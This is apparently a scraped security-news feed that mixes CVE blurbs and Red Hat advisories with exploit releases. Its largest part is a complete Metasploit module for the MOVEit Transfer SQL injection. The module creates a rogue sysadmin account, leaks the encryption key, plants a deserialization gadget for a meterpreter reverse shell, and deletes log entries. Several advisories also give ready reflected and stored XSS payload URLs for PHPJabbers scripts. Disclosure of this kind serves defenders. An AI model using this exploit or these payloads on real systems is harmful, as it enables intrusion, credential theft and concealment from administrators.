An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.

CVE-2023-36284

Unauth. SQL Injection (SQLi) vulnerability in InspireUI MStore API plugin <= 3.9.7 versions.

**Solution**

Fixed 

Update the WordPress MStore API plugin to the latest available version (at least 3.9.8).

Lucio Sá discovered and reported this SQL Injection vulnerability in WordPress MStore API Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information. This vulnerability has been fixed in version 3.9.8.

**Other vulnerabilities in this plugin**

 0 present

 12 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-47614: WordPress MStore API plugin <= 3.9.7 - SQL Injection - Patchstack

PHPJabbers Forum Script version 3.0 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.phpjabbers.com/php-forum-script/                               ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Forum Script 3.0                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /1687474733_118/preview.php?controller=pjLoad&action=pjActionAsk HTTP/1.1ask_question=1&name=[XSS Payload]&email=cracker@infosec.com&question=[XSS Payload]&description=[XSS Payload]&category_id=3-----------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'question' is vulnerable to XSSPOST parameter 'description' is vulnerable to XSS## Steps to Reproduce:1. Click on [+ New Question](as Guest)2. Inject your [XSS Payload] in "Full name"3. Inject your [XSS Payload] in "Question"4. Inject your [XSS Payload] in "Description"5. Select any [Category]6. Save (=Submit)5. When ADMIN Visit the [Questions] to Check [New Questions] on this Path (https://website/index.php?controller=pjAdminQuestions&action=pjActionIndex) in administration Panel6. XSS will Fire & Executed on his Browser7. Anyone visit your [Question Post] XSS will Fire & Executed on his Browser[-] Done

PHPJabbers Forum Script 3.0 Persistent Cross Site Scripting

PHPJabbers Forum Script version 3.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/php-forum-script/                               │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Forum Script 3.0                                                │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

URL parameter is vulnerable to RXSS

https://website/preview.php/xmbfr"><script>alert(1)</script>bqptl?controller=pjLoad&action=pjActionIndex&category_id=1

Path: /preview.php

GET parameter 'action' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndexje35u%3cimg%20src%3da%20onerror%3dalert(1)%3eo5ycr&category_id=1

Path: /preview.php

GET parameter 'column' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created%00undzx%3cscript%3ealert(1)%3c%2fscript%3eqqfc9&direction=DESC&keyword=

Path: /preview.php

GET parameter 'direction' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESCm1al6%22%3e%3cscript%3ealert(1)%3c%2fscript%3evwg49&keyword=

Path: /preview.php

GET parameter 'keyword' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=v467i%22%3e%3cscript%3ealert(1)%3c%2fscript%3ek9pxe

[-] Done

PHPJabbers Forum Script 3.0 Cross Site Scripting

This Metasploit module exploits an SQL injection vulnerability in the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can leverage an information leak be able to upload a .NET deserialization payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MOVEit SQL Injection vulnerability',        'Description' => %q{          This module exploits an SQL injection vulnerability in the MOVEit Transfer web application          that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.          Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an          attacker can leverage an information leak be able to upload a .NET deserialization payload.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # PoC https://github.com/sfewer-r7/CVE-2023-34362          'rbowes-r7', # research          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2023-34362' ],          ['URL', 'https://github.com/sfewer-r7/CVE-2023-34362'],          ['URL', 'https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis'],          ['URL', 'https://www.wiz.io/blog/cve-2023-34362']        ],        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Payload' => {          'Space' => 345        },        'Targets' => [          [            'Windows Command',            {              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'RPORT' => 443,                'SSL' => true              }            }          ],        ],        'DisclosureDate' => '2023-05-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Msf::OptString.new('TARGET_URI', [ false, 'Target URI', '/api/v1/token']),        Msf::OptString.new('USERNAME', [ true, 'Username', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('LOGIN_NAME', [ true, 'Login Name', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)])      ]    )    @moveit_token = nil    @moveit_instid = nil    @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com"    @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15)    @uploadfile_size = rand(5..64)    @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size)    @user_added = false    @files_json = nil  end  def begin_file_upload(folders_json, token_json)    boundary = rand_text_numeric(27)    post_data = "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n"    res = send_request_raw({      'method' => 'POST',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable"),      'headers' => {        'Content-Type' => 'multipart/form-data; boundary=' + boundary,        'Authorization' => "Bearer #{token_json['access_token']}"      },      'connection' => 'close',      'accept' => '*/*',      'data' => post_data.to_s    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #1 (#{files_response.body})") if res.nil? || res.code != 200    files_json = res.get_json_document    vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...")    files_json  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'),      'connection' => 'close',      'accept' => '*/*'    })    version = nil    if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version')      version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version'])      # 2020.1.x AKA 12.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10')      # 2021.0.x AKA 13.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8')      # 2021.1.x AKA 13.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6')      # 2022.0.x AKA 14.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6')      # 2022.1.x AKA 14.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7')      # 2023.0.x AKA 15.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3')    else      return Exploit::CheckCode::Safe    end    return Exploit::CheckCode::Unknown  end  def cleanup    cleanup_user(@files_json) if @user_added    super  end  def cleanup_user(files_json)    hax_username = datastore['USERNAME']    hax_loginname = datastore['LOGIN_NAME']    deleteuser_payload = [      "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload      "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", #      "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created      "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username      "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname      "DELETE FROM moveittransfer.log WHERE Username='Guest:#{@guest_email_addr}'", # The SQLi generates a guest log entry.    ]    if @user_added      vprint_status("Deleting user #{hax_username}")      sqli(sqli_payload(deleteuser_payload))      @user_added = false    end  end  def create_sysadmin    hax_username = datastore['USERNAME']    hax_password = datastore['PASSWORD']    hax_loginname = datastore['LOGIN_NAME']    createuser_payload = [      "UPDATE moveittransfer.hostpermits SET Host='*.*.*.*' WHERE Host!='*.*.*.*'",      "INSERT INTO moveittransfer.users (Username) VALUES ('#{hax_username}')",      "UPDATE moveittransfer.users SET LoginName='#{hax_loginname}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET InstID='#{@moveit_instid}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Password='#{makev1password(hax_password, Rex::Text.rand_text_alphanumeric(4))}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Permission='40' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET CreateStamp=NOW() WHERE Username='#{hax_username}'",    ]    res = sqli(sqli_payload(createuser_payload))    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't perform initial SQLi (#{res.body})") if res.code != 200    @user_added = true  end  def encrypt_deserialization_gadget(gadget, org_key)    org_key = org_key.gsub(' ', '')    org_key = [org_key].pack('H*').bytes.pack('C*')    deserialization_gadget = moveitv2encrypt(gadget, org_key)    deserialization_gadget  end  def find_folder_id(token_json)    folders_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('/api/v1/folders'),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API folders (#{folders_response.body})") if folders_response.nil? || folders_response.code != 200    folders_json = JSON.parse(folders_response.body)    vprint_status("Found folderId '#{folders_json['items'][0]['id']}'.")    folders_json  end  def get_csrf_token(res)    fail_with(Msf::Exploit::Failure::Unknown, 'No csrf token, or my code is bad') unless res.to_s.split(/\n/).join =~ /.*csrftoken" value="([a-f0-9]*)"/    ::Regexp.last_match(1)  end  def guestaccess_request(body)    res = send_request_cgi({      'method' => 'POST',      'keep_cookies' => true,      'uri' => normalize_uri('guestaccess.aspx'),      'connection' => 'close',      'accept' => '*/*',      'vars_post' => body    })    res  end  # Perform a request to the ISAPI endpoint with an arbitrary transaction  def isapi_request(transaction, headers)    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=m2'),      'keep_cookies' => true,      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'X-siLock-Test': 'abcdX-SILOCK-Transaction: folder_add_by_path',        'X-siLock-Transaction': transaction      }.merge(headers)    })  end  def leak_encryption_key(token_json, files_json)    haxleak_payload = [      # The \ gets escaped, so we leverage CHAR_LENGTH(39) to get the key we want (Standard Networks\siLock\Institutions\0) as all other KeyName's will be longer (Standard Networks\siLock\Institutions\1234)      "UPDATE moveittransfer.files SET UploadAgentBrand=(SELECT PairValue FROM moveittransfer.registryaudit WHERE PairName='Key' AND CHAR_LENGTH(KeyName)=#{'Standard Networks\siLock\Institutions\0'.length}) WHERE ID='#{files_json['fileId']}'"    ]    sqli(sqli_payload(haxleak_payload))    leak_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("/api/v1/files/#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #LEAK (#{leak_response.body})") if leak_response.nil? || leak_response.code != 200    leak_json = JSON.parse(leak_response.body)    org_key = leak_json['uploadAgentBrand']    vprint_status("Leaked the Org Key: #{org_key}")    org_key  end  def makev1password(password, salt = 'AAAA')    fail_with(Msf::Exploit::Failure::BadConfig, 'password cannot be empty') if password.empty?    fail_with(Msf::Exploit::Failure::BadConfig, 'salt must be 4 bytes') if salt.length != 4    # These two hardcoded values are found in MOVEit.DMZ.Core.Cryptography.Providers.SecretProvider.GetSecret    pwpre = Base64.decode64('=VT2jkEH3vAs=')    pwpost = Base64.decode64('=0maaSIA5oy0=')    md5 = Digest::MD5.new    md5.update(pwpre)    md5.update(salt)    md5.update(password)    md5.update(pwpost)    pw = [(4 + 4 + 16), 0, 0, 0].pack('CCCC')    pw << salt    pw << md5.digest    return Base64.strict_encode64(pw).gsub('+', '-')  end  def moveitv2encrypt(data, org_key, iv = nil, tag = '@%!')    fail_with(Msf::Exploit::Failure::BadConfig, 'org_key must be 16 bytyes') if org_key.length != 16    if iv.nil?      iv = Rex::Text.rand_text_alphanumeric(4)      # as we only store the first 4 bytes in the header, the IV must be a repeating 4 byte sequence.      iv *= 4    end    # MOVEit.DMZ.Core.Cryptography.Encryption    key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*')    key += org_key    key += [0, 0, 0, 0].pack('C*')    # MOVEit.Crypto.AesMOVEitCryptoTransform    cipher = OpenSSL::Cipher.new('AES-256-CBC')    cipher.encrypt    cipher.key = key    cipher.iv = iv    encrypted_data = cipher.update(data) + cipher.final    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader    header = [      225, # MOVEitV2EncryptedStringHeader      0,      data_sha1_hash[0],      data_sha1_hash[1],      org_key_sha1_hash[0],      org_key_sha1_hash[1],      org_key_sha1_hash[2],      org_key_sha1_hash[3],      iv.unpack('C*')[0],      iv.unpack('C*')[1],      iv.unpack('C*')[2],      iv.unpack('C*')[3],    ].pack('C*')    # MOVEit.DMZ.Core.Cryptography.Encryption    return tag + Base64.strict_encode64(header + encrypted_data)  end  def populate_token_instid    begin      res = send_request_cgi({        'method' => 'GET',        'keep_cookies' => true,        'connection' => 'keep-alive',        'accept' => '*/*'      })      cookies = res.get_cookies      # Get the session id from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!') unless cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/      @moveit_token = ::Regexp.last_match(1)      vprint_status("Received ASP.NET_SessionId cookie: #{@moveit_token}")      # Get the InstID from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!') unless cookies =~ /siLockLongTermInstID=([0-9]+);/      @moveit_instid = ::Regexp.last_match(1)      vprint_status("Received siLockLongTermInstID cookie: #{@moveit_instid}")    end    true  end  def request_api_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/api/v1/token'),      'Content-Type' => 'application/x-www-form-urlencoded',      'connection' => 'keep-alive',      'accept' => '*/*',      'vars_post' => {        'grant_type' => 'password',        'username' => datastore['LOGIN_NAME'],        'password' => datastore['PASSWORD']      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})") if res.code != 200    token_json = JSON.parse(res.body)    vprint_status("Got API access token='#{token_json['access_token']}'.")    token_json  end  def set_session(session_hash)    session_vars = {}    session_index = 0    session_hash.each_pair do |k, v|      session_vars["X-siLock-SessVar#{session_index}"] = "#{k}: #{v}"      session_index += 1    end    isapi_request('session_setvars', session_vars)  end  def sqli(sql_payload)    # Set up a fake package in the session. The order here is important. We set these session    # variables one per request, so first set the package information, then switch over to a    # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this    # order the session will be cleared and the injection will not work.    set_session({      'MyPkgAccessCode' => 'accesscode', # Must match the final request Arg06      'MyPkgID' => '0', # Is self provisioned? (must be 0)      'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs      'MyPkgInstID' => '1234', # this can be any int value      'MyPkgSelfProvisionedRecips' => sql_payload,      'MyUsername' => 'Guest'    })    # Get a CSRF token - this has to be *after* you set MyUsername, since the    # username is incorporated into it    #    # Transaction => request type, different types will work    # Arg06 => the package access code (must match what's set above)    # Arg12 => promptaccesscode requests a form, which contains a CSRF code    body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' }    csrf = get_csrf_token(guestaccess_request(body))    # This does the actual injection    body = {      'Arg06' => 'accesscode',      'transaction' => 'secmsgpost',      'Arg01' => 'subject',      'Arg04' => 'body',      'Arg05' => 'sendauto',      'Arg09' => 'pkgtest9',      'csrftoken' => csrf    }    guestaccess_request(body)  end  def sqli_payload(sql_payload)    # Create the initial injection, and create the session object    payload = [      # The initial injection      "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')",    ].concat(sql_payload)    # Join our payload, and terminate with a comment character    return payload.join(';') + ';#'  end  def trigger_deserialization(token_json, files_json, folders_json)    files_response = send_request_cgi({      'method' => 'PUT',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'verify' => false,      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}",        'Content-Type' => 'application/octet-stream',        'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}",        'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data)      },      'data' => @uploadfile_data    })    # 500 if payload runs :)    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #2 code=#{files_response.code} (#{files_response.body})") if files_response.code != 500  end  def upload_encrypted_gadget(encrypted_gadget, files_json)    haxupload_payload = [      "UPDATE moveittransfer.fileuploadinfo SET State='#{encrypted_gadget}' WHERE FileID='#{files_json['fileId']}'",    ]    vprint_status('Planting encrypted gadget into the DB...')    sqli(sqli_payload(haxupload_payload))  end  def exploit    # Get the sessionID and siLockLongTermInstID    print_status('[01/11] Get the sessionID and siLockLongTermInstID')    populate_token_instid    # Allow Remote Access and Create new sysAd    print_status('[02/11] Create New Sysadmin')    create_sysadmin    print_status('[03/11] Get API Token')    token_json = request_api_token    print_status('[04/11] Get Folder ID')    folders_json = find_folder_id(token_json)    print_status('[05/11] Begin File Upload')    @files_json = begin_file_upload(folders_json, token_json)    print_status('[06/11] Leak Encryption Key')    org_key = leak_encryption_key(token_json, @files_json)    print_status('[07/11] Generate Gadget')    gadget = ::Msf::Util::DotNetDeserialization.generate(      payload.encoded,      gadget_chain: :TextFormattingRunProperties,      formatter: :BinaryFormatter    )    print_status('[08/11] Encrypt Gadget')    b64_gadget = Rex::Text.encode_base64(gadget)    encrypted_gadget = encrypt_deserialization_gadget(b64_gadget, org_key)    print_status('[09/11] Upload Encrypted Gadget')    upload_encrypted_gadget(encrypted_gadget, @files_json)    print_status('[10/11] Trigger Gadget')    trigger_deserialization(token_json, @files_json, folders_json)    print_status('[11/11] Cleaning Up')    cleanup_user(@files_json)  endend

MOVEit SQL Injection

PHPJabbers STIVA Blog Script version 4.1 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/stiva-blog-script/                              │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers STIVA Blog Script 4.1                                           │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

GET 'category_id' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&category_id=5qn281%22%3e%3cscript%3ealert(1)%3c%2fscript%3enjmk9

GET 'lid' parameter is vulnerable to RXSS

https://website/preview.php?lid=umxpr"><script>alert(1)</script>dbyiw&pjPage=2

GET 'archive' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=b5bzk%22%3e%3cscript%3ealert(1)%3c%2fscript%3em9gtp&keyword=123

GET 'keyword' parameter is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=&keyword=123fcgbt%22%3e%3cscript%3ealert(1)%3c%2fscript%3eya0py

URL parameter is vulnerable to RXSS

https://website/preview.php/f76te"><script>alert(1)</script>cq8x2?controller=pjLoad&action=pjActionIndex&category_id=5

[-] Done

PHPJabbers STIVA Blog Script 4.1 Cross Site Scripting

Red Hat Security Advisory 2023-3742-02 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. Issues addressed include bypass, denial of service, and remote SQL injection vulnerabilities.

Red Hat Security Advisory 2023-3742-02

Red Hat Security Advisory 2023-3777-01 - Python is an interpreted, interactive, object-oriented programming language that supports modules, classes, exceptions, high-level dynamic data types, and dynamic typing. The python27 packages provide a stable release of Python 2.7 with a number of additional utilities and database connectors for MySQL and PostgreSQL. Issues addressed include a bypass vulnerability.

Red Hat Security Advisory 2023-3777-01

PHPJabbers Knowledge Base Builder version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.phpjabbers.com/knowledge-base-builder/                         ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Knowledge Base Builder 3.0                                      ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET parameter 'action' is vulnerable to RXSShttps://website/preview.php?controller=pjLoad&action=pjActionIndexd6941%3cimg%20src%3da%20onerror%3dalert(1)%3edas75&pjPage=2[-] Done

PHPJabbers Knowledge Base Builder 3.0 Cross Site Scripting

Red Hat Security Advisory 2023-3776-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: python39:3.9 and python39-devel:3.9 security update  
Advisory ID:       RHSA-2023:3776-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3776  
Issue date:        2023-06-22  
CVE Names:         CVE-2023-24329   
=====================================================================

1. Summary:

An update for the python39:3.9 and python39-devel:3.9 modules is now  
available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: urllib.parse url blocklisting bypass (CVE-2023-24329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

